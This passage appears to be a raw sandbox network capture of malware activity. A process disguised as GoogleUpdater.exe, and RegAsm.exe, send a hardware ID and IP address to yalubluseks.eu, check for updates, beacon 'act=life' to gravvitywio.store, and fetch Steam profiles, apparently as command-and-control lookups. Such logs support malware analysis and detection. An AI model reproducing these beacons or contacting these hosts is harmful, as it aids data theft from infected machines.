                                                                                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                          Host: yalubluseks.eu
                                                                                                                                                                                                                                          Content-Length: 84
                                                                                                                                                                                                                                          Expect: 100-continue
                                                                                                                                                                                                                                          2024-10-02 12:44:33 UTC25INHTTP/1.1 100 Continue
                                                                                                                                                                                                                                          2024-10-02 12:44:33 UTC84OUTData Raw: 68 77 69 64 3d 64 31 65 62 37 39 63 63 61 63 65 32 65 32 62 31 34 34 33 35 64 64 65 30 35 39 63 64 32 61 63 35 65 62 32 39 37 39 38 33 65 35 35 64 64 63 61 65 62 61 32 37 63 62 37 63 36 65 35 61 66 36 64 63 26 69 70 3d 38 2e 34 36 2e 31 32 33 2e 33 33
                                                                                                                                                                                                                                          Data Ascii: hwid=d1eb79ccace2e2b14435dde059cd2ac5eb297983e55ddcaeba27cb7c6e5af6dc&ip=8.46.123.33
                                                                                                                                                                                                                                          2024-10-02 12:44:34 UTC613INHTTP/1.1 200 OK
                                                                                                                                                                                                                                          Date: Wed, 02 Oct 2024 12:44:34 GMT
                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                          CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=fRa65zEFH1ku2Cv0Fcbdhj%2BceImvzlmGIgCmy%2BOS8pACTU8v5aGseKGSnREKcnPpnhTlcjSwGNNB9Sukt%2FTJe1YBGGL3M%2BSlkzdexM%2FG3h6g6ty%2BLU8nbI00dtZ4WGRNVQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                                                          CF-RAY: 8cc4c8d7fcd5432b-EWR
                                                                                                                                                                                                                                          0


                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                          83192.168.2.658615104.102.49.254443
                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                          2024-10-02 12:44:34 UTC219OUTGET /profiles/76561199724331900 HTTP/1.1
                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                          Host: steamcommunity.com
                                                                                                                                                                                                                                          2024-10-02 12:44:34 UTC1870INHTTP/1.1 200 OK
                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                          Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.akamai.steamstatic.com/ https://cdn.akamai.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.akamai.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq. [TRUNCATED]
                                                                                                                                                                                                                                          Expires: Mon, 26 Jul 1997 05:00:00 GMT
                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                          Date: Wed, 02 Oct 2024 12:44:34 GMT
                                                                                                                                                                                                                                          Content-Length: 34837
                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                          Set-Cookie: sessionid=b94607dc082526c96a75f819; Path=/; Secure; SameSite=None
                                                                                                                                                                                                                                          Set-Cookie: steamCountry=US%7Cd7fb65801182a5f50a3169fe2a0b7ef0; Path=/; Secure; HttpOnly; SameSite=None
                                                                                                                                                                                                                                          2024-10-02 12:44:34 UTC14514INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 20 72 65 73 70 6f 6e 73 69 76 65 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0d 0a 09 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 68 65 6d 65 2d 63 6f 6c 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 23 31 37 31 61 32 31 22 3e 0d 0a 09 09 3c
                                                                                                                                                                                                                                          Data Ascii: <!DOCTYPE html><html class=" responsive" lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1"><meta name="theme-color" content="#171a21"><
                                                                                                                                                                                                                                          2024-10-02 12:44:34 UTC16384INData Raw: 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0d 0a 09 09 6a 51 75 65 72 79 28 66 75 6e 63 74 69 6f 6e 28 24 29 20 7b 0d 0a 09 09 09 24 28 27 23 67 6c 6f 62 61 6c 5f 68 65 61 64 65 72 20 2e 73 75 70 65 72 6e 61 76 27 29 2e 76 5f 74 6f 6f 6c 74 69 70 28 7b 27 6c 6f 63 61 74 69 6f 6e 27 3a 27 62 6f 74 74 6f 6d 27 2c 20 27 64 65 73 74 72 6f 79 57 68 65 6e 44 6f 6e 65 27 3a 20 66 61 6c 73 65 2c 20 27 74 6f 6f 6c 74 69 70 43 6c 61 73 73 27 3a 20 27 73 75 70 65 72 6e 61 76 5f 63 6f 6e 74 65 6e 74 27 2c 20 27 6f 66 66 73 65 74 59 27 3a 2d 36 2c 20 27 6f 66 66 73 65 74 58 27 3a 20 31 2c 20 27 68 6f 72 69 7a 6f 6e 74 61 6c 53 6e 61 70 27 3a 20 34 2c 20 27 74 6f 6f 6c 74 69 70 50 61 72 65 6e 74 27 3a 20 27 23 67 6c 6f
                                                                                                                                                                                                                                          Data Ascii: <script type="text/javascript">jQuery(function($) {$('#global_header .supernav').v_tooltip({'location':'bottom', 'destroyWhenDone': false, 'tooltipClass': 'supernav_content', 'offsetY':-6, 'offsetX': 1, 'horizontalSnap': 4, 'tooltipParent': '#glo
                                                                                                                                                                                                                                          2024-10-02 12:44:34 UTC3768INData Raw: 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 72 6f 66 69 6c 65 5f 73 75 6d 6d 61 72 79 5f 66 6f 6f 74 65 72 22 3e 0d 0a 09 09 09 09 09 09 09 3c 73 70 61 6e 20 64 61 74 61 2d 70 61 6e 65 6c 3d 22 7b 26 71 75 6f 74 3b 66 6f 63 75 73 61 62 6c 65 26 71 75 6f 74 3b 3a 74 72 75 65 2c 26 71 75 6f 74 3b 63 6c 69 63 6b 4f 6e 41 63 74 69 76 61 74 65 26 71 75 6f 74 3b 3a 74 72 75 65 7d 22 20 63 6c 61 73 73 3d 22 77 68 69 74 65 4c 69 6e 6b 22 20 63 6c 61 73 73 3d 22 77 68 69 74 65 4c 69 6e 6b 22 3e 56 69 65 77 20 6d 6f 72 65 20 69 6e 66 6f 3c 2f 73 70 61 6e 3e 0d 0a 09 09 09 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 09 09 09 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 20 24 4a 28 20 66 75 6e 63 74 69 6f 6e 28 29
                                                                                                                                                                                                                                          Data Ascii: <div class="profile_summary_footer"><span data-panel="{&quot;focusable&quot;:true,&quot;clickOnActivate&quot;:true}" class="whiteLink" class="whiteLink">View more info</span></div><script type="text/javascript"> $J( function()
                                                                                                                                                                                                                                          2024-10-02 12:44:34 UTC171INData Raw: 09 3c 73 70 61 6e 3e 56 69 65 77 20 6d 6f 62 69 6c 65 20 77 65 62 73 69 74 65 3c 2f 73 70 61 6e 3e 0d 0a 09 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 0d 0a 09 3c 2f 64 69 76 3e 09 3c 21 2d 2d 20 72 65 73 70 6f 6e 73 69 76 65 5f 70 61 67 65 5f 63 6f 6e 74 65 6e 74 20 2d 2d 3e 0d 0a 0d 0a 3c 2f 64 69 76 3e 09 3c 21 2d 2d 20 72 65 73 70 6f 6e 73 69 76 65 5f 70 61 67 65 5f 66 72 61 6d 65 20 2d 2d 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e
                                                                                                                                                                                                                                          Data Ascii: <span>View mobile website</span></div></div></div></div>... responsive_page_content --></div>... responsive_page_frame --></body></html>


                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                          84192.168.2.658616172.67.140.924436320C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exe
                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                          2024-10-02 12:44:34 UTC146OUTPOST /get_update.php HTTP/1.1
                                                                                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                          Host: yalubluseks.eu
                                                                                                                                                                                                                                          Content-Length: 19
                                                                                                                                                                                                                                          Expect: 100-continue
                                                                                                                                                                                                                                          2024-10-02 12:44:34 UTC25INHTTP/1.1 100 Continue
                                                                                                                                                                                                                                          2024-10-02 12:44:34 UTC19OUTData Raw: 63 75 72 72 65 6e 74 5f 76 65 72 73 69 6f 6e 3d 30 2e 33
                                                                                                                                                                                                                                          Data Ascii: current_version=0.3
                                                                                                                                                                                                                                          2024-10-02 12:44:35 UTC641INHTTP/1.1 200 OK
                                                                                                                                                                                                                                          Date: Wed, 02 Oct 2024 12:44:35 GMT
                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                          CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=yas4c9xgtsl%2BAkla0JvNSDOkzfKf5CzRp2XjhIapvzJgmM%2BxQdQSSMseNPRe4VKvcry74ICwR2CiaPt%2BL4Gy6tYpNVx6ch9%2BzQTKoxzu%2BMdcroOA8mRCW7jg8yqLQozbvg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                                                          CF-RAY: 8cc4c8dddb041971-EWR
                                                                                                                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                          0


                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                          85192.168.2.658617104.21.16.12443
                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                          2024-10-02 12:44:35 UTC264OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                          Content-Length: 8
                                                                                                                                                                                                                                          Host: gravvitywio.store
                                                                                                                                                                                                                                          2024-10-02 12:44:35 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                                                                                                                                                                                          Data Ascii: act=life
                                                                                                                                                                                                                                          2024-10-02 12:44:35 UTC780INHTTP/1.1 200 OK
                                                                                                                                                                                                                                          Date: Wed, 02 Oct 2024 12:44:35 GMT
                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                          Set-Cookie: PHPSESSID=9mcrjj98257cmhfeb6maiebpcg; expires=Sun, 26 Jan 2025 06:31:14 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                          Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                                                                                          CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=MBvmW9dRPMz9AgkHL9TdbXQ%2BnHcA8ILig1lvKUMQOZ74kcQdgvN4lI%2FkR5%2FrM6t8gdMeGF7xpWK7jPFmNHqQTJw9iXdQmAC3C5g%2FjMw8JURrftv5vNVv%2FYUZhUzaO2pOd8Ee%2Fg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                                                          CF-RAY: 8cc4c8e058360f84-EWR
                                                                                                                                                                                                                                          2024-10-02 12:44:35 UTC15INData Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a
                                                                                                                                                                                                                                          Data Ascii: aerror #D12
                                                                                                                                                                                                                                          2024-10-02 12:44:35 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                          Data Ascii: 0


                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                          86192.168.2.658618104.102.49.254443
                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                          2024-10-02 12:44:43 UTC119OUTGET /profiles/76561199780418869 HTTP/1.1
                                                                                                                                                                                                                                          Host: steamcommunity.com
                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                          2024-10-02 12:44:43 UTC1870INHTTP/1.1 200 OK
                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                          Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.akamai.steamstatic.com/ https://cdn.akamai.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.akamai.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq. [TRUNCATED]
                                                                                                                                                                                                                                          Expires: Mon, 26 Jul 1997 05:00:00 GMT
                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                          Date: Wed, 02 Oct 2024 12:44:43 GMT
                                                                                                                                                                                                                                          Content-Length: 34879
                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                          Set-Cookie: sessionid=b64b6c834ece341fbe9a5074; Path=/; Secure; SameSite=None
                                                                                                                                                                                                                                          Set-Cookie: steamCountry=US%7Cd7fb65801182a5f50a3169fe2a0b7ef0; Path=/; Secure; HttpOnly; SameSite=None
                                                                                                                                                                                                                                          2024-10-02 12:44:43 UTC14514INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 20 72 65 73 70 6f 6e 73 69 76 65 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0d 0a 09 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 68 65 6d 65 2d 63 6f 6c 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 23 31 37 31 61 32 31 22 3e 0d 0a 09 09 3c
                                                                                                                                                                                                                                          Data Ascii: <!DOCTYPE html><html class=" responsive" lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1"><meta name="theme-color" content="#171a21"><
                                                                                                                                                                                                                                          2024-10-02 12:44:43 UTC16384INData Raw: 52 54 09 09 09 3c 2f 61 3e 0d 0a 09 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0d 0a 09 09 6a 51 75 65 72 79 28 66 75 6e 63 74 69 6f 6e 28 24 29 20 7b 0d 0a 09 09 09 24 28 27 23 67 6c 6f 62 61 6c 5f 68 65 61 64 65 72 20 2e 73 75 70 65 72 6e 61 76 27 29 2e 76 5f 74 6f 6f 6c 74 69 70 28 7b 27 6c 6f 63 61 74 69 6f 6e 27 3a 27 62 6f 74 74 6f 6d 27 2c 20 27 64 65 73 74 72 6f 79 57 68 65 6e 44 6f 6e 65 27 3a 20 66 61 6c 73 65 2c 20 27 74 6f 6f 6c 74 69 70 43 6c 61 73 73 27 3a 20 27 73 75 70 65 72 6e 61 76 5f 63 6f 6e 74 65 6e 74 27 2c 20 27 6f 66 66 73 65 74 59 27 3a 2d 36 2c 20 27 6f 66 66 73 65 74 58 27 3a 20 31 2c 20 27 68 6f 72 69 7a 6f 6e 74 61 6c 53 6e 61 70 27 3a 20 34
                                                                                                                                                                                                                                          Data Ascii: RT</a></div><script type="text/javascript">jQuery(function($) {$('#global_header .supernav').v_tooltip({'location':'bottom', 'destroyWhenDone': false, 'tooltipClass': 'supernav_content', 'offsetY':-6, 'offsetX': 1, 'horizontalSnap': 4
                                                                                                                                                                                                                                          2024-10-02 12:44:44 UTC3768INData Raw: 75 6d 6d 61 72 79 22 3e 0d 0a 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 09 09 09 09 09 09 09 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 72 6f 66 69 6c 65 5f 73 75 6d 6d 61 72 79 5f 66 6f 6f 74 65 72 22 3e 0d 0a 09 09 09 09 09 09 09 3c 73 70 61 6e 20 64 61 74 61 2d 70 61 6e 65 6c 3d 22 7b 26 71 75 6f 74 3b 66 6f 63 75 73 61 62 6c 65 26 71 75 6f 74 3b 3a 74 72 75 65 2c 26 71 75 6f 74 3b 63 6c 69 63 6b 4f 6e 41 63 74 69 76 61 74 65 26 71 75 6f 74 3b 3a 74 72 75 65 7d 22 20 63 6c 61 73 73 3d 22 77 68 69 74 65 4c 69 6e 6b 22 20 63 6c 61 73 73 3d 22 77 68 69 74 65 4c 69 6e 6b 22 3e 56 69 65 77 20 6d 6f 72 65 20 69 6e 66 6f 3c 2f 73 70 61 6e 3e 0d 0a 09 09 09 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 09 09 09 09 3c 73 63 72
                                                                                                                                                                                                                                          Data Ascii: ummary"></div><div class="profile_summary_footer"><span data-panel="{&quot;focusable&quot;:true,&quot;clickOnActivate&quot;:true}" class="whiteLink" class="whiteLink">View more info</span></div><scr
                                                                                                                                                                                                                                          2024-10-02 12:44:44 UTC213INData Raw: 63 6b 3d 22 52 65 73 70 6f 6e 73 69 76 65 5f 52 65 71 75 65 73 74 4d 6f 62 69 6c 65 56 69 65 77 28 29 22 3e 0d 0a 09 09 09 09 09 3c 73 70 61 6e 3e 56 69 65 77 20 6d 6f 62 69 6c 65 20 77 65 62 73 69 74 65 3c 2f 73 70 61 6e 3e 0d 0a 09 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 0d 0a 09 3c 2f 64 69 76 3e 09 3c 21 2d 2d 20 72 65 73 70 6f 6e 73 69 76 65 5f 70 61 67 65 5f 63 6f 6e 74 65 6e 74 20 2d 2d 3e 0d 0a 0d 0a 3c 2f 64 69 76 3e 09 3c 21 2d 2d 20 72 65 73 70 6f 6e 73 69 76 65 5f 70 61 67 65 5f 66 72 61 6d 65 20 2d 2d 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e
                                                                                                                                                                                                                                          Data Ascii: ck="Responsive_RequestMobileView()"><span>View mobile website</span></div></div></div></div>... responsive_page_content --></div>... responsive_page_frame --></body></html>


                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                          87192.168.2.658619104.102.49.254443340C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                          2024-10-02 12:44:43 UTC119OUTGET /profiles/76561199780418869 HTTP/1.1
                                                                                                                                                                                                                                          Host: steamcommunity.com
                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                          2024-10-02 12:44:43 UTC1870INHTTP/1.1 200 OK
                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                          Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.akamai.steamstatic.com/ https://cdn.akamai.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.akamai.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq. [TRUNCATED]
                                                                                                                                                                                                                                          Expires: Mon, 26 Jul 1997 05:00:00 GMT
                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                          Date: Wed, 02 Oct 2024 12:44:43 GMT
                                                                                                                                                                                                                                          Content-Length: 34879
                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                          Set-Cookie: sessionid=2e9d8fd354d6bc022539dfc9; Path=/; Secure; SameSite=None
                                                                                                                                                                                                                                          Set-Cookie: steamCountry=US%7Cd7fb65801182a5f50a3169fe2a0b7ef0; Path=/; Secure; HttpOnly; SameSite=None
                                                                                                                                                                                                                                          2024-10-02 12:44:43 UTC14514INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 20 72 65 73 70 6f 6e 73 69 76 65 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0d 0a 09 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 68 65 6d 65 2d 63 6f 6c 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 23 31 37 31 61 32 31 22 3e 0d 0a 09 09 3c
                                                                                                                                                                                                                                          Data Ascii: <!DOCTYPE html><html class=" responsive" lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1"><meta name="theme-color" content="#171a21"><
                                                                                                                                                                                                                                          2024-10-02 12:44:43 UTC16384INData Raw: 52 54 09 09 09 3c 2f 61 3e 0d 0a 09 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0d 0a 09 09 6a 51 75 65 72 79 28 66 75 6e 63 74 69 6f 6e 28 24 29 20 7b 0d 0a 09 09 09 24 28 27 23 67 6c 6f 62 61 6c 5f 68 65 61 64 65 72 20 2e 73 75 70 65 72 6e 61 76 27 29 2e 76 5f 74 6f 6f 6c 74 69 70 28 7b 27 6c 6f 63 61 74 69 6f 6e 27 3a 27 62 6f 74 74 6f 6d 27 2c 20 27 64 65 73 74 72 6f 79 57 68 65 6e 44 6f 6e 65 27 3a 20 66 61 6c 73 65 2c 20 27 74 6f 6f 6c 74 69 70 43 6c 61 73 73 27 3a 20 27 73 75 70 65 72 6e 61 76 5f 63 6f 6e 74 65 6e 74 27 2c 20 27 6f 66 66 73 65 74 59 27 3a 2d 36 2c 20 27 6f 66 66 73 65 74 58 27 3a 20 31 2c 20 27 68 6f 72 69 7a 6f 6e 74 61 6c 53 6e 61 70 27 3a 20 34
                                                                                                                                                                                                                                          Data Ascii: RT</a></div><script type="text/javascript">jQuery(function($) {$('#global_header .supernav').v_tooltip({'location':'bottom', 'destroyWhenDone': false, 'tooltipClass': 'supernav_content', 'offsetY':-6, 'offsetX': 1, 'horizontalSnap': 4
                                                                                                                                                                                                                                          2024-10-02 12:44:43 UTC3768INData Raw: 75 6d 6d 61 72 79 22 3e 0d 0a 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 09 09 09 09 09 09 09 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 72 6f 66 69 6c 65 5f 73 75 6d 6d 61 72 79 5f 66 6f 6f 74 65 72 22 3e 0d 0a 09 09 09 09 09 09 09 3c 73 70 61 6e 20 64 61 74 61 2d 70 61 6e 65 6c 3d 22 7b 26 71 75 6f 74 3b 66 6f 63 75 73 61 62 6c 65 26 71 75 6f 74 3b 3a 74 72 75 65 2c 26 71 75 6f 74 3b 63 6c 69 63 6b 4f 6e 41 63 74 69 76 61 74 65 26 71 75 6f 74 3b 3a 74 72 75 65 7d 22 20 63 6c 61 73 73 3d 22 77 68 69 74 65 4c 69 6e 6b 22 20 63 6c 61 73 73 3d 22 77 68 69 74 65 4c 69 6e 6b 22 3e 56 69 65 77 20 6d 6f 72 65 20 69 6e 66 6f 3c 2f 73 70 61 6e 3e 0d 0a 09 09 09 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 09 09 09 09 3c 73 63 72
